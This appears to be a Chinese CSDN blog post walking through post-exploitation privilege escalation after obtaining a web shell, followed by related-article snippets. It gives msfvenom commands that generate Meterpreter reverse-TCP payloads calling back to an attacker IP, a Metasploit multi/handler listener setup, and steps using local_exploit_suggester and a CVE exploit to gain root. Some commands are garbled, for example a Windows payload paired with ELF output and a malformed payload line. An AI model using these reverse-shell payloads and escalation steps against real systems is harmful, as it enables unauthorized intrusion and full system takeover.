拿到GETSHELL之后的提权

最新推荐文章于 2025-04-22 11:49:39 发布
最新推荐文章于 2025-04-22 11:49:39 发布
阅读量1.8k 收藏 11
点赞数 6
分类专栏: 提权 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69678131/article/details/130642734
版权
文章讲述了在获取目标系统getshell后,如何利用蚁剑、冰鞋或哥斯拉等工具进行连接,然后在Kali环境下通过msfconsole创建payload进行反向TCP连接。接着,通过multi/handler模块进行监听,并使用local_exploit_suggester模块寻找提权机会,最终利用特定CVE漏洞提升权限至root。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、当我们那到一个getshell我们可以直接使用蚁剑/冰鞋/哥斯拉来进行链接

2、链接之后我们要对其进行攻击

2.1、打开kali之后使用msfconsole

2.2、进入之后

1、生成

-p windows/x64/meterpreter/reverse_tcp //载入64位payload攻击载荷,如需32位把x64去掉即可

lhost=192.168.2.129 //设置本机kali的IP地址(ifconfig查看本机IP地址)

lport=6666 //设置一个监听端口,可以随意,未被占用即可

-f exe //定义此文件的类型为exe

-o test.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.194 lport=6666 -f elf -o wang.elf (如果文件是带锁的加权限)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f elf -o test.elf

 监听

msfconsole //进入框架

use exploit/multi/handler //载入模块看上面使用的模块

set payload linux/x64/meterpreter reverse_tcp //加载攻击负载核

set lhost 192.168.0.194 //设置本地监听地址,和生成的木马地址一致

set lport 6666 //设置本地监听端口,和生成的木马地址一致

run 666

3、到这之后我们就要开始提权了

3.1、我们使用bg命令进入后台

 

3.2、之后使用 use multi/recon/local_exploit_suggeste模块

 

3.3、之后进行set sessions 1 那个会话要提权就设置那个会话

 

3.4、之后会找到可以提权的的cve漏洞

3.5、use + 选择的cve漏洞

3.6、之后 set session 1 会话 然后run

 

3.7、之后就得到了root权限

获取Shell)后的操作(windows、Linux)
墨痕诉清风的博客
07-26 8268
查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法了。但是这里要注意,远程连接前判断该用户是否在线,万一对方管理员在线,你把人家给挤下去了,这样一下子就暴露了。先查看当前用户身份,是否是root限身份,如果不是的话,查看系统版本,是否可以利用已知漏洞的,比如 CVE-2016-5195。:获得了限之后,尽一切可能搜集该主机的信息,该主机上各种服务的用户名和密码。当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?..
[渗透测试篇]主机操作系统渗透之浅谈Linux
qq_43668710的博客
04-18 1171
前言 为何而写 其实这篇博客的出现是因为上一篇关于Vulnhub靶机系列的DC-1才决定来写的,因为在那篇文章中针对靶机的姿势涉及到了我的知识盲区----.于是,不允许放任自己"无知"的我,决定了这篇文章的诞生,以记录我对linux的学习和认知! 圣经 附:文章开始正文开始之前先给大家安利一篇出自大神g0tmi1k之手的Linux圣经Basic Linux Privilege Es...
完成ubuntu-ctf靶机渗透 最终得到shell
m0_60319766的博客
02-17 4385
完成ubuntu-ctf靶机渗透 最终得到shell
【菜鸟腾飞】简单的Getshell和windows_漏洞研究
11-01
【菜鸟腾飞】简单的Getshell和windows_漏洞研究【菜鸟腾飞】简单的Getshell和windows_漏洞研究
0day 挖到手软,403 到 getshell,从零基础到精通,收藏这篇就够了!_最新getshell
最新发布
喜欢Python编程的程序员柚柚呀
04-22 867
一顿操作下来,漏洞不少。但是,看了下供应链,注册资金3kw,没证书,G!
getshell
weixin_30951743的博客
12-18 959
getshell 一、起因 学校推出新的党建系统,之前党建系统还参与开发,后来因为一些原因没有开发,主要想看看这届工作室的学弟、学妹代码水平,把源码撸下来审计一下,工作室用git开发的,记着上一篇文章是通过Githack把源码一把梭,结果这次再用Githack时撸不下来了,就有了下文了。 二、信息搜集 通过御剑扫到phpinfo.php页面。 得到网站根目录:/www/wwwr...
getshell
inslight的博客
09-22 2671
getshell
phpmyadmin getshell
blue_fantasy的博客
01-11 904
Text. 环境准备:win7,phpstudy(包含phpmyadmin,可用旧版) 开始攻击: 通过弱口令,信息收集,爆破等方式获知phpmyadmin的账号密码是root root 开始登录目标机器上的phpmyadmin 2.检测MySQL全局变量(generallog、generallog file)的值。 在SQL处输入sql语句: SHOW VARIABLES LIKE ‘general%’ 看到general log 指的是日志保存状态,一共有两个值(ON/OFF)ON
拿下shell命令
09-11 395
分享常用的DOS命令:查看版本:ver 查看限:whoami 查看配置:systeminfo 查看用户:net user 查看进程:tasklist 查看正在运行的服务:tasklist /svc 查看开放的所有端口:netstat -ano 查询管理用户名:query user 查看搭建环境:ftp 127.0.0.1 查看指定服务的路径:sc qc Mysql 添加一个用户:net...
数据库GetShell
saber的博客
10-21 1149
各类常见数据库方式及资料文章
记一次从零到getshell的渗透历程
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 3543
0x00 前期 拿到测试范围清单后,首先用脚本获取了下各个子站的标题,基本都是XXX管理系统。浏览器查看后,各个子站也大同小异,纯登录系统,带验证码。这些系统基本都是jsp写的,逮到了两个没有验证码的小宝贝,一番暴力破解,小宝贝对我说:别爱我,没结果。又看到了两个站返回的Set-Cookie头:rememberMe=deleteMe; 很明显,这是Apache Shiro。打了一波exp,没有反应,放弃。搞了三天啥都没搞出来,和女朋友出去玩散散心,还是很高兴。 0x01 初显进展 测试范围内有六个门户
拿webshell的教程
04-03
拿webshell到的教程.part1.rar
CVE-2018-8120-Webshell下可用版本
07-16
1 漏洞描述 Microsoft Windows 7 SP1、Windows Server 2008 SP2和Windows Server 2008 R2 SP1都是美国微软(Microsoft)公司的产品。Microsoft Windows 7 SP1是一套供个人电脑使用的操作系统;Windows Server 2008 SP2是一套服务器操作系统。R2 SP1是它的升级版。 Microsoft Windows中存在漏洞,该漏洞源于Win32k组件没有正确的处理内存中的对象。攻击者可利用该漏洞在内核模式下以升的限执行任意代码。 2 漏洞标识符 CVE ID: CVE-2018-8120 3 影响系统 受影响系统: Microsoft Windows 7 SP1 Windows Server 2008 SP2 Windows Server 2008 R2 SP1 来自GIT一位大神的exp 使用方式
拿下shell技巧
09-11 574
的技巧分享:1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.com cmd.txt cmd.rar等 2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那...
Metasploit拿到shell后 低限---
qq_58000413的博客
08-24 1728
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
AdmX_new(Wordpress getshell & 二次
weixin_46591320的博客
11-26 1601
Wordpress getshell
内网渗透拿掉shell限的几个小思路--洪水猛兽
weixin_42665738的博客
09-09 1730
成功上传webshell限的几个小思路 思路一:想办法获得Administrator密码 使用getpass直接获取并破解密码: 如果getpass被查杀,可以使用PwDump7.exe或者QuarksPwDump.exe得到密码的NTML哈希值,然后再去各种MD5网站解密。 如果得到密码的NTML哈希无法破解,可以采用彩虹表爆破的方式,爆破出Administrator的密码:保存扫描出的NTML哈希值->使用ophcrack(去官网下载字典库https://ophcrack.so
拿到shell之后干什么_从Shell一条龙
weixin_39574050的博客
11-24 2530
声明:The3ight原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!在一次渗透中,拿到域名WWW.*****.COM,访问网站,发现疑似注入点http://www.*****.com/ProductDetails.aspx?id=40,放入SqlMap,无果。查找后台,手动输入/admin...
getshell之后难忘的经历
蚁景网安学院
09-12 681
1前言背景是这样的,大佬moza在两台服务器搭了一道题,说是组合getshell问过Moza大佬,说投稿前要打码。2整理思路直接测试第二个,加了waf的那台服务器打开链接,发现有部分...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值